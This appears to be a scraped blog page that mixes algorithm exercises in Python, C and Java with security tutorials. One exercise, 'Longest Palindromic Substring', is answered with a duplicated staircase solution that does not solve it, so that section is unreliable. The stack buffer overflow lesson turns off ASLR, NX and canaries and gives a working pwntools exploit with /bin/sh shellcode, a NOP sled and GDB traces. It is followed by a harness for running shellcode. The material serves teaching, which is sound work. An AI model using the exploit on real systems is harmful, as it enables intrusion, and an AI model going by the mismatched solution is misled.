C

Format String Vulnerability

TODO

Building Houses

The text of the exercise is the following: A builder is looking to build a row of N houses that can be of K different colours. He has a goal of minimizing cost while ensuring that no two neighbouring houses are not of the same colour. Given an N by K matrix where the nth row and kth column represents the cost to build the nth house with kth colour, return the minimum cost which achieves this goal. Before solving the exercise, we can ask few questions to specify few aspects that might not be clear: Can an house cost 0? No. Can N > K or N < K ? Yes. My solution It is clear that finding the minimum iteratively for each house can return a local minimal solution but we are interested in the global minima. Python C Java import math N = 6 K = 4 cost_matrix = [ [1 , 20, 34, 20], [40, 10, 15, 30], [50, 1, 20, 40], [70, 80, 30, 1 ], [1 , 60, 30, 40], [70, 50, 1 , 20] ] def find_house(row, col, tot, min_tot): if row < N: tot += cost_matrix[row][col] for c in range(K): if c != col: min_tot = find_house(row+1, c, tot, min_tot) else: if min_tot > tot: min_tot = tot return min_tot def main(): print ("Minimum value found:", find_house(0,0,0, math.inf)) #include<stdio.h> #include<limits.h> #define K 4 #define N 6 int cost_matrix[N][K] = { {1 , 20, 34, 20}, {40, 10, 15, 30}, {50, 1, 20, 40}, {70, 80, 30, 1 }, {1 , 60, 30, 40}, {70, 50, 1 , 20} }; int find_house(int row, int col, int tot, int min_tot) { if (row < N) { tot += cost_matrix[row][col]; for (int c=0; c<K; c++) { if (c != col) min_tot = find_house(row+1,c, tot, min_tot); } } else { if (min_tot > tot) min_tot = tot; } return min_tot; } int main() { printf("Minimal cost: %d\n", find_house(0, 0, 0, INT_MAX)); return 0; } public class BuildHouse { static int N=6; static int K=4; static int cost_matrix[][] = { {1 , 20, 34, 20}, {40, 10, 15, 30}, {50, 1, 20, 40}, {70, 80, 30, 1 }, {1 , 60, 30, 40}, {70, 50, 1 , 20} }; public static void main(String[] args) { System.out.println("Minimum value found: "+ findHouse(0,0,0,Integer.MAX_VALUE)); } static int findHouse(int row, int col, int tot, int min_tot) { if (row < N) { tot += cost_matrix[row][col]; for (int c=0; c<K; c++) { if (c != col) min_tot = findHouse(row+1, c, tot, min_tot); } } else { if (min_tot > tot) min_tot = tot; } return min_tot; } } Code Explanation The function find_house is a recursive function that takes the row, col, tot and min_tot as input parameters. The function transform the matrix into a tree and perform a kind of “depth-first” exploration returning the minimum of the total found. row represents the row of the house. col represents column of the house. tot represents the total up to the reached node. min_tot represents the minimum of the cost found up to that moment The recursion stops when all the nodes have been explored. Time complexity: $ O(N^K) $ Space complexity: $ O(N^K) $

Longest Palindromic Substring

The text of the exercise is the following: Given a string s, find the longest palindromic substring in s. You may assume that the maximum length of s is 1000. Example 1: Input: “babad” Output: “bab” Note: “aba” is also a valid answer. Example 2: Input: “cbbd” Output: “bb” My solution Python C Java N = 4 solutions = [] def staircase(n, result): if n == 1: solutions.append(result+","+"1") return if n == 0: solutions.append(result) return staircase(n-2, result + ",2") staircase(n-1, result + ",1") if __name__ == "__main__": staircase(N,"") print("\n".join([s[1:] for s in solutions])) #include <stdio.h> #include <stdlib.h> #include <string.h> char** solutions; int N = 4; int n_solution=0; void staircase(int n, char *result); char* strAdd(char* begin, char* end); void addSolution(char* solution); void staircase(int n, char *result) { char *str1,*str2; if (n == 1) { str1 = strAdd(result, ",1"); addSolution(str1); free((void*)str1); return; } else if (n == 0) { addSolution(result); return; } str1 = strAdd(result, ",1"); str2 = strAdd(result, ",2"); staircase(n-1, str1); staircase(n-2, str2); free((void*)str1); free((void*)str2); } char* strAdd(char* begin, char* end) { char* str; str = (char*) malloc(sizeof(char) * (strlen(begin)+ strlen(end) + 1)); if (str == NULL) exit(1); str = strcpy(str, begin); str = strcat(str, end); return str; } void addSolution(char* solution) { char *str = (char*) malloc(sizeof(char) * strlen(solution) + 1); if (str == NULL) exit(1); n_solution++; solutions = (char**) realloc(solutions, sizeof(char*) * n_solution); if (solutions == NULL) { free(solutions); exit(1); } str = strcpy(str, solution); solutions[n_solution-1] = str; return; } int main(int argc, char* argv[]) { int i; solutions = solutions=malloc(sizeof(char**)); if (solutions == NULL) exit(1); staircase(N,""); for(i=0; i< n_solution; i++ ) { printf("%s\n", solutions[i]+1); free((void*)solutions[i]); } free(solutions); return 0; } import java.util.ArrayList; import java.util.Iterator; import java.util.List; public class NStepStaircase { static List<String> solutions = new ArrayList<String>(); public static void main(String[] args) { int N=4; staircase(N, new StringBuffer()); Iterator<String> iter = NStepStaircase.solutions.iterator(); String str; while(iter.hasNext()) { str = iter.next(); System.out.println(str.substring(1, str.length())); } } static void staircase(int n, StringBuffer result) { if (n == 1) { NStepStaircase.solutions.add(result.append(",1").toString()); return; } else if (n == 0) { solutions.add(result.toString()); return; } staircase(n-1, new StringBuffer(result).append(",1")); staircase(n-2, new StringBuffer(result).append(",2")); } } Code Explanation The function `staircase` is a recursive function that takes the `n` and `result` as input parameters. * `n` represents the number of stairs that remains to be climbed. * `result` represents the steps covered so far. The recursion stops when there are no more steps to climb or when there are only 1 stair left. **Time complexity**: \$ O(2^N) \$ **Space complexity**: \$ O(2^N) \$ Generalized solution Python C Java N = 9 solutions = [] STEPS = [1, 3, 5] def staircase(n, result): if n == 0: solutions.append(result) return for s in STEPS: if n-s >= 0: staircase(n-s, result + "," + str(s)) if __name__ == "__main__": staircase(N,"") print("\n".join([s[1:] for s in solutions])) #include <stdio.h> #include <stdlib.h> #include <string.h> #include <math.h> char** solutions; int N = 4; int n_solution=0; int STEPS[] = {1,2,3}; void staircase(int n, char *result); char* strAdd(char* begin, int number); void addSolution(char* solution); void staircase(int n, char *result) { char *str; if (n == 0) { addSolution(result); return; } for (int i=0; i<sizeof(STEPS)/sizeof(STEPS[0]); i++) { if ( n-STEPS[i] >= 0) { str = strAdd(result, STEPS[i]); staircase(n-STEPS[i], str); free((void*)str); } } } char* strAdd(char* begin, int number) { char* str; str = (char*) malloc(sizeof(char) * (strlen(begin)+ floor(log10(number))+1 +1 + 1)); //1 for '\0', 1 for ',', 1 for if (str == NULL) exit(1); sprintf(str, "%s,%d", begin, number); return str; } void addSolution(char* solution) { char *str = (char*) malloc(sizeof(char) * strlen(solution) + 1); if (str == NULL) exit(1); n_solution++; solutions = (char**) realloc(solutions, sizeof(char*) * n_solution); if (solutions == NULL) { free(solutions); exit(1); } str = strcpy(str, solution); solutions[n_solution-1] = str; return; } int main(int argc, char* argv[]) { int i; solutions = solutions=malloc(sizeof(char**)); if (solutions == NULL) exit(1); staircase(N,""); for(i=0; i< n_solution; i++ ) { printf("%s\n", solutions[i]+1); free((void*)solutions[i]); } free(solutions); return 0; } import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.Arrays; public class NStepStaircaseGeneral { static List<String> solutions = new ArrayList<String> (); static List<Integer> STEPS = new ArrayList<Integer>(Arrays.asList(1,2)); public static void main(String[] args) { int N=4; staircase(N, new StringBuffer()); Iterator<String> iter = NStepStaircaseGeneral.solutions.iterator(); String str; while(iter.hasNext()) { str = iter.next(); System.out.println(str.substring(1, str.length())); } } static void staircase(int n, StringBuffer result) { Iterator<Integer> iter = NStepStaircaseGeneral.STEPS.iterator(); Integer step; if (n == 0) { solutions.add(result.toString()); return; } while (iter.hasNext()) { step = iter.next(); if ((n - step) >= 0) { staircase(n-step, new StringBuffer(result).append(","+step)); } } } } **Time complexity**: \$ O(k^N) \$ \$;\$ \$k = | STEPS | \$ **Space complexity**: \$ O(k^N) \$ \$;\$ \$k = | STEPS | \$ --

N Steps Staircase

The text of the exercise is the following: There’s a staircase with N steps, and you can climb 1 or 2 steps at a time. Given N, write a function that prints all the unique ways you can climb the staircase. The order of the steps matters. For example, if N is 4, then there are 5 unique ways: 1, 1, 1, 1 2, 1, 1 1, 2, 1 1, 1, 2 2, 2 What if, instead of being able to climb 1 or 2 steps at a time, you could climb any number from a set of positive integers X? For example, if X = {1, 3, 5}, you could climb 1, 3, or 5 steps at a time. Generalize your function to take in X. Before solving the exercise, we can ask few questions to specify few aspects that might not be clear. Are the steps going to be always positive number? Yes. In the general case, is 1 going to be always in the possible steps? No. My solution Python C Java N = 4 solutions = [] def staircase(n, result): if n == 1: solutions.append(result+","+"1") return if n == 0: solutions.append(result) return staircase(n-2, result + ",2") staircase(n-1, result + ",1") if __name__ == "__main__": staircase(N,"") print("\n".join([s[1:] for s in solutions])) #include <stdio.h> #include <stdlib.h> #include <string.h> char** solutions; int N = 4; int n_solution=0; void staircase(int n, char *result); char* strAdd(char* begin, char* end); void addSolution(char* solution); void staircase(int n, char *result) { char *str1,*str2; if (n == 1) { str1 = strAdd(result, ",1"); addSolution(str1); free((void*)str1); return; } else if (n == 0) { addSolution(result); return; } str1 = strAdd(result, ",1"); str2 = strAdd(result, ",2"); staircase(n-1, str1); staircase(n-2, str2); free((void*)str1); free((void*)str2); } char* strAdd(char* begin, char* end) { char* str; str = (char*) malloc(sizeof(char) * (strlen(begin)+ strlen(end) + 1)); if (str == NULL) exit(1); str = strcpy(str, begin); str = strcat(str, end); return str; } void addSolution(char* solution) { char *str = (char*) malloc(sizeof(char) * strlen(solution) + 1); if (str == NULL) exit(1); n_solution++; solutions = (char**) realloc(solutions, sizeof(char*) * n_solution); if (solutions == NULL) { free(solutions); exit(1); } str = strcpy(str, solution); solutions[n_solution-1] = str; return; } int main(int argc, char* argv[]) { int i; solutions = solutions=malloc(sizeof(char**)); if (solutions == NULL) exit(1); staircase(N,""); for(i=0; i< n_solution; i++ ) { printf("%s\n", solutions[i]+1); free((void*)solutions[i]); } free(solutions); return 0; } import java.util.ArrayList; import java.util.Iterator; import java.util.List; public class NStepStaircase { static List<String> solutions = new ArrayList<String>(); public static void main(String[] args) { int N=4; staircase(N, new StringBuffer()); Iterator<String> iter = NStepStaircase.solutions.iterator(); String str; while(iter.hasNext()) { str = iter.next(); System.out.println(str.substring(1, str.length())); } } static void staircase(int n, StringBuffer result) { if (n == 1) { NStepStaircase.solutions.add(result.append(",1").toString()); return; } else if (n == 0) { solutions.add(result.toString()); return; } staircase(n-1, new StringBuffer(result).append(",1")); staircase(n-2, new StringBuffer(result).append(",2")); } } Code Explanation The function staircase is a recursive function that takes the n and result as input parameters. n represents the number of stairs that remains to be climbed. result represents the steps covered so far. The recursion stops when there are no more steps to climb or when there are only 1 stair left. Time complexity: $ O(2^N) $ Space complexity: $ O(2^N) $ Generalized solution Python C Java N = 9 solutions = [] STEPS = [1, 3, 5] def staircase(n, result): if n == 0: solutions.append(result) return for s in STEPS: if n-s >= 0: staircase(n-s, result + "," + str(s)) if __name__ == "__main__": staircase(N,"") print("\n".join([s[1:] for s in solutions])) #include <stdio.h> #include <stdlib.h> #include <string.h> #include <math.h> char** solutions; int N = 4; int n_solution=0; int STEPS[] = {1,2,3}; void staircase(int n, char *result); char* strAdd(char* begin, int number); void addSolution(char* solution); void staircase(int n, char *result) { char *str; if (n == 0) { addSolution(result); return; } for (int i=0; i<sizeof(STEPS)/sizeof(STEPS[0]); i++) { if ( n-STEPS[i] >= 0) { str = strAdd(result, STEPS[i]); staircase(n-STEPS[i], str); free((void*)str); } } } char* strAdd(char* begin, int number) { char* str; str = (char*) malloc(sizeof(char) * (strlen(begin)+ floor(log10(number))+1 +1 + 1)); //1 for '\0', 1 for ',', 1 for if (str == NULL) exit(1); sprintf(str, "%s,%d", begin, number); return str; } void addSolution(char* solution) { char *str = (char*) malloc(sizeof(char) * strlen(solution) + 1); if (str == NULL) exit(1); n_solution++; solutions = (char**) realloc(solutions, sizeof(char*) * n_solution); if (solutions == NULL) { free(solutions); exit(1); } str = strcpy(str, solution); solutions[n_solution-1] = str; return; } int main(int argc, char* argv[]) { int i; solutions = solutions=malloc(sizeof(char**)); if (solutions == NULL) exit(1); staircase(N,""); for(i=0; i< n_solution; i++ ) { printf("%s\n", solutions[i]+1); free((void*)solutions[i]); } free(solutions); return 0; } import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.Arrays; public class NStepStaircaseGeneral { static List<String> solutions = new ArrayList<String> (); static List<Integer> STEPS = new ArrayList<Integer>(Arrays.asList(1,2)); public static void main(String[] args) { int N=4; staircase(N, new StringBuffer()); Iterator<String> iter = NStepStaircaseGeneral.solutions.iterator(); String str; while(iter.hasNext()) { str = iter.next(); System.out.println(str.substring(1, str.length())); } } static void staircase(int n, StringBuffer result) { Iterator<Integer> iter = NStepStaircaseGeneral.STEPS.iterator(); Integer step; if (n == 0) { solutions.add(result.toString()); return; } while (iter.hasNext()) { step = iter.next(); if ((n - step) >= 0) { staircase(n-step, new StringBuffer(result).append(","+step)); } } } } Time complexity: $ O(k^N) $ $;$ $k = | STEPS | $ Space complexity: $ O(k^N) $ $;$ $k = | STEPS | $

Basic Stack-Based Buffer Overflow

In this article, I am going to show how to exploit a stack-based buffer overflow and the conditions that make this possible. For the purpose of this exercise, we are going to switch off 3 security features: Address Space Layout Randomization (ASLR) Non-executable stack (aka stack execution prevention, aka NX Bit) Stack canary (aka stack-protector) How to switch off ASLR To switch off ASLR: $ sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space' (Note that I didn’t do sudo echo 0 > /proc/sys/kernel/randomize_va_space because the output redirection command > will be performed as standard user but we need root permission to perform this operation.) How to switch off non-executable stack and stack canary security features To switch off the non-executable stack and the stack canary protections, we need to compile the program as follow: $ gcc -fno-stack-protector -z execstack -o overflow64 overflow64.c The use of the option -z execstack will prevent stack to be non-executable (i.e., it will be executable) while the option -fno-stack-protector disable the stack canary protection. Stack-based buffer overflow scheme The overflow of a variable positioned in the stack occurs when an operation is performed without checking the details of such operation resulting in a writing beyond the boundaries of such variable. When an operation write data on a buffer based on the stack beyond its limits, this operation can cause the overwriting of the return address of the function where this variable is allocated. This is because, as explained in The Stack, the local variables are above the return address as shown in the picture below. How we can exploit this situation? What can we write into the stack? The left stacks in both images represent a normal stack. The right stacks in both images represent a stack after the unsafe write operation. The unsafe operation started to write data from the top of the stack (where the stack variable is stored) and continue beyond its limit to overwrite the return address of the same function. This address is where the program expect to find the return address of the function. By overwriting this address we are able to to diverge the execution of the program. In this image, we can see that in the stack is written also some nop slides before the shellcode. These are only a series of nop operations, i.e., no-operation operation (0x90 in machine code). We use nop slide because sometimes it is difficult to the jump to the start of the shellcode. In this way it is possible to jump approximately before it. The nop operation is 1 byte long, and jumping to any byte address where these operations are located will not cause any error. This instruction is used because it does not do anything and it moves to the next operation. At the end of the nop slide the shellcode will be located and executed. The program to exploit This is the source code of the program that we are going to exploit: // file: overflow64.c #include<stdio.h> int main(int argc, char* argv[]) { char buff[20]; scanf("%s", buff); return 0; } In line 7, there is a vulnerable operation. Why vulnerable? Because it does not check the boundaries of the arrays that are being copied (check man scanf). Let’s compile this program as described in previously. The first thing we need to do is to crash the program. If we input more than 20 characters the program crash: $ ./overflow64 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Segmentation fault (core dumped) We can see that the terminal reports Segmentation fault. Let’s try to get a bit more details on this crash. The next step is to understand why it is crashing. By running dmesg: $ dmesg | tail ...... [13401.299114] overflow64[16566]: segfault at 616161616161 ip 0000616161616161 sp 00007fffffffddb0 error 14 in libc-2.27.so[7ffff79e4000+1e7000] The logs shown by dmesg show that the program named “overflow64” received a segfault (segmentation fault) when trying to access a memory location with address 616161616161. (When we run the program, we input a lot of “a” that in ASCII are represented with the hexadecimal value of 0x61. Is it a coincidence? Spoiler alert: no.) This happen because the program is trying to access a memory address that is not supposed to. Giving in input more “a"s we can incur in a different dmesg message: $ dmesg | tail ...... [13747.451995] traps: overflow64[16766] general protection ip:555555554697 sp:7fffffffdda8 error:0 in overflow64[555555554000+1000] In this case the message is referring to a general protection. What is this? In x86_64 bit architecture the maximum canonical address is currently 0x00007fffffffffff. Therefore even if an address is 64 bit long, current processor use only 48 bits of those. This was done because 48 bit address gives already an address space of 256 terabytes, therefore it will be enough for quite a long future. Therefore instead of wasting hardware and power resources, the hardware manufactures decided this way. The architecture design support 64 bit but the current hardware implementations do not. To gather even more information on the crash we can run the program within GDB. For this purpose I use GEF to have an easier access to debug information. $ gdb -q ./overflow64 GEF for linux ready, type `gef` to start, `gef config` to configure 73 commands loaded for GDB 8.1.0.20180409-git using Python engine 3.6 Reading symbols from ./overflow64...(no debugging symbols found)...done. gef➤ r Starting program: /home/pippo/ctf/lectures/basic_buffer_overflow/overflow64 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Program received signal SIGSEGV, Segmentation fault. [ Legend: Modified register | Code | Heap | Stack | String ] ───────────────────────────────────────────────────────────────── registers ──── $rax : 0x0 $rbx : 0x0 $rcx : 0x00007ffff7dd0560 → 0x00007ffff7dcc580 → 0x00007ffff7b9996e → 0x636d656d5f5f0043 ("C"?) $rdx : 0x00007ffff7dd18d0 → 0x0000000000000000 $rsp : 0x00007fffffffdcd8 → "aaaaaaaaaaaaaaaaaa" $rbp : 0x6161616161616161 ("aaaaaaaa"?) $rsi : 0x1 $rdi : 0x0 $rip : 0x0000555555554697 → <main+45> ret $r8 : 0x0 $r9 : 0x0 $r10 : 0x0 $r11 : 0x0000555555554726 → add BYTE PTR [rax], al $r12 : 0x0000555555554560 → <_start+0> xor ebp, ebp $r13 : 0x00007fffffffddb0 → 0x0000000000000001 $r14 : 0x0 $r15 : 0x0 $eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 ───────────────────────────────────────────────────────────────────── stack ──── 0x00007fffffffdcd8│+0x0000: "aaaaaaaaaaaaaaaaaa" ← $rsp 0x00007fffffffdce0│+0x0008: "aaaaaaaaaa" 0x00007fffffffdce8│+0x0010: 0x00007fffff006161 ("aa"?) 0x00007fffffffdcf0│+0x0018: 0x0000000100008000 0x00007fffffffdcf8│+0x0020: 0x000055555555466a → <main+0> push rbp 0x00007fffffffdd00│+0x0028: 0x0000000000000000 0x00007fffffffdd08│+0x0030: 0x7d8cd030cadb6f2f 0x00007fffffffdd10│+0x0038: 0x0000555555554560 → <_start+0> xor ebp, ebp ─────────────────────────────────────────────────────────────── code:x86:64 ──── 0x55555555468c <main+34> call 0x555555554540 <__isoc99_scanf@plt> 0x555555554691 <main+39> mov eax, 0x0 0x555555554696 <main+44> leave → 0x555555554697 <main+45> ret [!] Cannot disassemble from $PC ─────────────────────────────────────────────────────────────────── threads ──── [#0] Id 1, Name: "overflow64", stopped, reason: SIGSEGV ───────────────────────────────────────────────────────────────────── trace ──── [#0] 0x555555554697 → main() ──────────────────────────────────────────────────────────────────────────────── 0x0000555555554697 in main () In line 47, this program stopped because received the SIGSEGV i.e., segmentation fault (see man 7 signal for more information on signals). In lines 41-45, you can see code information. You can see that the program stopped at the ret instruction. In lines 12-30, you can see registers information. In lines 32-39, you can see stack information. In line 7, we can see the input that we fed to the program. The ret takes the address pointed by the stack pointer (rsp) and continue the execution from there. The address that the program is trying to jump to is an invalid address that we overwrite when we overflow the address. Our goal is to be able to write in this address an arbitrary address so that we can divert the execution. We need to write an address that when executed its content will eventually execute our shellcode. With the help of GDB we can break in the main function and have a look at the stack address of the function: $ gdb -q ./overflow64 GEF for linux ready, type `gef` to start, `gef config` to configure 73 commands loaded for GDB 8.1.0.20180409-git using Python engine 3.6 Reading symbols from ./overflow64...(no debugging symbols found)...done. gef➤ b main Breakpoint 1 at 0x66e gef➤ r Starting program: /home/pippo/ctf/lectures/basic_buffer_overflow/overflow64 ...... ──────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ──── 0x00007fffffffdcc0│+0x0000: 0x00005555555546a0 → <__libc_csu_init+0> push r15 ← $rsp, $rbp 0x00007fffffffdcc8│+0x0008: 0x00007ffff7a05b97 → <__libc_start_main+231> mov edi, eax 0x00007fffffffdcd0│+0x0010: 0x0000000000000001 0x00007fffffffdcd8│+0x0018: 0x00007fffffffdda8 → 0x00007fffffffe12f → "/home/pippo/ctf/lectures/basic_buffer_overflow/ove[...]" 0x00007fffffffdce0│+0x0020: 0x0000000100008000 0x00007fffffffdce8│+0x0028: 0x000055555555466a → <main+0> push rbp 0x00007fffffffdcf0│+0x0030: 0x0000000000000000 0x00007fffffffdcf8│+0x0038: 0x34f880d1fbfab7e5 ────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ──── 0x555555554665 <frame_dummy+5> jmp 0x5555555545d0 <register_tm_clones> 0x55555555466a <main+0> push rbp 0x55555555466b <main+1> mov rbp, rsp → 0x55555555466e <main+4> sub rsp, 0x30 0x555555554672 <main+8> mov DWORD PTR [rbp-0x24], edi 0x555555554675 <main+11> mov QWORD PTR [rbp-0x30], rsi 0x555555554679 <main+15> lea rax, [rbp-0x20] 0x55555555467d <main+19> mov rsi, rax 0x555555554680 <main+22> lea rdi, [rip+0x9d] # 0x555555554724 ...... Breakpoint 1, 0x000055555555466e in main () (The snippet shows only the interesting parts.) In line 11, we can see that the stack is currently at position 0x00007fffffffdcc0. The space of the local variable have not been allocated yet as shown in line 23. When we overflow the local variables we are going to write our shellcode around this address. In order to execute the shellcode we need to overwrite the return address of the function with our crafted address. The location of the return address to overwrite is relative to the buffer that we are overflowing depends on many things. It depends on the size of other local variables (and their positions compared to the overflowed one) the stack alignment, and to the presence of the stack canary. The best way to find the correct location is to try to input increasingly number of input until we can see that we overwrite the return address of the function. Once we find the offset of the return address, we need to point it to the shellcode. We have already found the location near where the shellcode will be located. What needs to be placed in the stack is a nop slide to help to reach our shellcode as shown previously. This is achieved with the following code (I am using Pwntools): # filename: exploit_overflow64.py from pwn import * import sys # process name to exploit process_path = "./overflow64" shellcode = "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f" shellcode += "\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57" shellcode += "\x54\x5f\x6a\x3b\x58\x0f\x05" # return address obtained by adding 0x30 to the top of the stack # maximum canonical address size is 0x00007FFFFFFFFFFF ret_addr = "\x00\x00\x7f\xff\xff\xff\xdd\x50"[::-1] payload = "A"*40 + ret_addr payload += "\x90" * 500 + shellcode # Writing payload to file to be used elsewhere (e.g., GDB) f = open("payload", 'w') f.write(payload) f.close() # start the program proc = process(process_path) # send payload proc.sendline(payload) # we need interact with the spawned shell proc.interactive() proc.close() In line 16, we can see that I am preparing the input to the scanf function writing 40 “A”, then the return address, then 500 nop operations and finally the shellcode. Now can can give the input to the function that will overflow the variable and write the correct return address. We can run it on GDB and break it just after the scanf function our stack will look like this: gef➤ dereference $rsp 20 0x00007fffffffdc90│+0x0000: 0x00007fffffffdda8 → 0x9090909090909090 ← $rsp 0x00007fffffffdc98│+0x0008: 0x0000000100000000 0x00007fffffffdca0│+0x0010: 0x4141414141414141 0x00007fffffffdca8│+0x0018: 0x4141414141414141 0x00007fffffffdcb0│+0x0020: 0x4141414141414141 0x00007fffffffdcb8│+0x0028: 0x4141414141414141 0x00007fffffffdcc0│+0x0030: 0x4141414141414141 ← $rbp 0x00007fffffffdcc8│+0x0038: 0x00007fffffffdd50 → 0x9090909090909090 0x00007fffffffdcd0│+0x0040: 0x9090909090909090 0x00007fffffffdcd8│+0x0048: 0x9090909090909090 0x00007fffffffdce0│+0x0050: 0x9090909090909090 The address below the rbp is the one that contains the return address that we overwrite when we overflow the variable and now it points to a location where nop are store. At the end of the nop there is the shellcode, when executed, the program is going to eventually execute the shellcode that was our initial goal

How to Test a Shellcode

A shellcode is a piece of compiled code that is typically given as input to a program that, when executed, is going to launch a shell (see Build Your Own Shellcode). To test a shellcode we are going to used the following code: // filename: test_shellcode.c char *code = "<shellcodegoeshere>"; int main() { void (*shell)(); shell=(void (*)())code; (*shell)(); } In line 2, we are going to copy the shellcode that we want to test. In line 5, we are declaring the variable shell as a pointer to a function that returns void and that takes no arguments. In line 6, we are casting the string pointer code to the same type of the variable shell (i.e.: a function that returns void and that takes no arguments.) In line 7, we are calling the function pointed by the shell variable (passing no parameters). Once we filled the code variable with the shellcode (in line 1), we can compile the program and run it as: $ gcc -o test_shellcode test_shellcode.c $ ./test_shellcode In this way we can understand if the shellcode will work on the current system. To give a shellcode in input to a program in order to execute it we have to be careful about few more things as explained in Build Your Own Shellcode. Understanding the test program The content pointed by the variable code is going to be allocated in an executable portion of the memory layout. The command $ readelf -a ./test_shellcode gives a lot of information. Let’s try to brake it down for easy to digest. If we examine the symbol tables $ readelf -s ./test_shellcode we can see something like this: Symbol table '.symtab' contains 62 entries: Num: Value Size Type Bind Vis Ndx Name 0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND 1: 0000000000000238 0 SECTION LOCAL DEFAULT 1 2: 0000000000000254 0 SECTION LOCAL DEFAULT 2 3: 0000000000000274 0 SECTION LOCAL DEFAULT 3 ......... 59: 0000000000000000 0 FUNC WEAK DEFAULT UND __cxa_finalize@@GLIBC_2.2 60: 00000000000004d0 0 FUNC GLOBAL DEFAULT 10 _init 61: 0000000000201010 8 OBJECT GLOBAL DEFAULT 22 code In line 10, the symbol code is shown with a Value of 0000000000201010. The Value column represent the address of the symbol. The command $ readelf -S ./test_shellcode shows the header sections of the ELF file: Section Headers: [Nr] Name Type Address Offset Size EntSize Flags Link Info Align [ 0] NULL 0000000000000000 00000000 0000000000000000 0000000000000000 0 0 0 [ 1] .interp PROGBITS 0000000000000238 00000238 000000000000001c 0000000000000000 A 0 0 1 [ 2] .note.ABI-tag NOTE 0000000000000254 00000254 0000000000000020 0000000000000000 A 0 0 4 ...... [21] .got PROGBITS 0000000000200fc0 00000fc0 0000000000000040 0000000000000008 WA 0 0 8 [22] .data PROGBITS 0000000000201000 00001000 0000000000000018 0000000000000000 WA 0 0 8 [23] .bss NOBITS 0000000000201018 00001018 0000000000000008 0000000000000000 WA 0 0 1 Here, we can see that the .data section has an address of 0000000000201000 and a size of 0000000000000018. The symbol code is defined as the address of 0000000000201010 i.e., inside the .data section. We could have gather the same information by running $ objdump -t ./test: SYMBOL TABLE: 0000000000000238 l d .interp 0000000000000000 .interp 0000000000000254 l d .note.ABI-tag 0000000000000000 .note.ABI-tag 0000000000000274 l d .note.gnu.build-id 0000000000000000 .note.gnu.build-id 0000000000000298 l d .gnu.hash 0000000000000000 .gnu.hash 00000000000002b8 l d .dynsym 0000000000000000 .dynsym ...... 0000000000000000 w *UND* 0000000000000000 _ITM_registerTMCloneTable 0000000000000000 w F *UND* 0000000000000000 __cxa_finalize@@GLIBC_2.2.5 00000000000004d0 g F .init 0000000000000000 _init 0000000000201010 g O .data 0000000000000008 code In line 11, we can see that the symbol code is declared in the section .data. To know the permission that a section has, we can have to look at the Program Headers and at the Section to Segment mapping by running $ readelf -a ./test_shellcode: Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flags Align PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040 0x00000000000001f8 0x00000000000001f8 R 0x8 INTERP 0x0000000000000238 0x0000000000000238 0x0000000000000238 0x000000000000001c 0x000000000000001c R 0x1 [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2] LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000818 0x0000000000000818 R E 0x200000 LOAD 0x0000000000000df0 0x0000000000200df0 0x0000000000200df0 0x0000000000000228 0x0000000000000230 RW 0x200000 DYNAMIC 0x0000000000000e00 0x0000000000200e00 0x0000000000200e00 0x00000000000001c0 0x00000000000001c0 RW 0x8 NOTE 0x0000000000000254 0x0000000000000254 0x0000000000000254 0x0000000000000044 0x0000000000000044 R 0x4 GNU_EH_FRAME 0x00000000000006d4 0x00000000000006d4 0x00000000000006d4 0x000000000000003c 0x000000000000003c R 0x4 GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 RW 0x10 GNU_RELRO 0x0000000000000df0 0x0000000000200df0 0x0000000000200df0 0x0000000000000210 0x0000000000000210 R 0x1 Section to Segment mapping: Segment Sections... 00 01 .interp 02 .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .init .plt .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame 03 .init_array .fini_array .dynamic .got .data .bss 04 .dynamic 05 .note.ABI-tag .note.gnu.build-id 06 .eh_frame_hdr 07 08 .init_array .fini_array .dynamic .got Here we can see that the .data section is mapped into the segment 03 (i.e., the 4th segment). Under the “Program Header” we can count the segments from the top; the first is PHDR segment, the second is INTERP and the fourth is LOAD with permission to read and to write (but not execute!). If we don’t have the execute permission, how come that we are able to run the code?? Let’s run the code in GDB to clarify this point (I am using GEF): Reading symbols from ./test_shellcode...(no debugging symbols found)...done. gef➤ b main Breakpoint 1 at 0x61e gef➤ r Starting program: /home/pippo/ctf/lectures/build_shellcode/test Breakpoint 1, 0x000055555555461e in main () gef➤ info address code Symbol "code" is at 0x555555755010 in a file compiled without debugging. gef➤ x/1g 0x555555755010 0x555555755010 <code>: 0x5555555546c4 gef➤ x/1g 0x5555555546c4 0x5555555546c4: 0x5bf0000003cb8 In line 7, we are printing the address of the global variable code that is located 0x555555755010 (as shown in line 8). This variable is a pointer to the location of memory 0x5555555546c4 (line 10). To understand what are the permission of those different memory locations we can run gef➤ vmmap: gef➤ vmmap Start End Offset Perm Path 0x0000555555554000 0x0000555555555000 0x0000000000000000 r-x /home/pippo/ctf/lectures/build_shellcode/test_shellcode 0x0000555555754000 0x0000555555755000 0x0000000000000000 r-- /home/pippo/ctf/lectures/build_shellcode/test_shellcode 0x0000555555755000 0x0000555555756000 0x0000000000001000 rw- /home/pippo/ctf/lectures/build_shellcode/test_shellcode 0x00007ffff79e4000 0x00007ffff7bcb000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.27.so 0x00007ffff7bcb000 0x00007ffff7dcb000 0x00000000001e7000 --- /lib/x86_64-linux-gnu/libc-2.27.so 